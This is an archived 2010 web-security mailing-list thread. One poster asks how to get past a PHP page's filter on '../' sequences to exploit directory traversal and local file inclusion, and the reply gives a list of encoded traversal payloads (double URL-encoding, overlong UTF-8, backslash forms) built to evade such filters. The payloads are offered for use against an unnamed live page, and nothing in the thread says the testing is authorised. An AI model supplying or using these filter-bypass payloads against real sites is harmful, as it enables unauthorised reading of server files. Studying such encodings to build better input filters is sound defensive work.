[WEB SECURITY] ../ filtered

Shlomi Narkolayev shlominar at gmail.com
Tue Feb 16 01:41:16 EST 2010


Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME


Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> new
1400 variants for directory traversal.

Kind Regards,
Narkolayev Shlomi.



*From:** Beatriz Duran [mailto:beatrizdrn at yahoo.com]
Sent: Monday, February 15, 2010 9:43 AM
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ../ filtered*



Hi, I need to find a vulnerability in a url that could be exploited for
directory traversal and LFI; the page is working with PHP but it is
filtering /../ and also /%2e%2e/, because the pace is  using ISO for Latin
characters I can't use unicode extended because it reinterpret with other
values; is there another way to work around the filter?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100216/69e178b8/attachment.html>


More information about the websecurity mailing list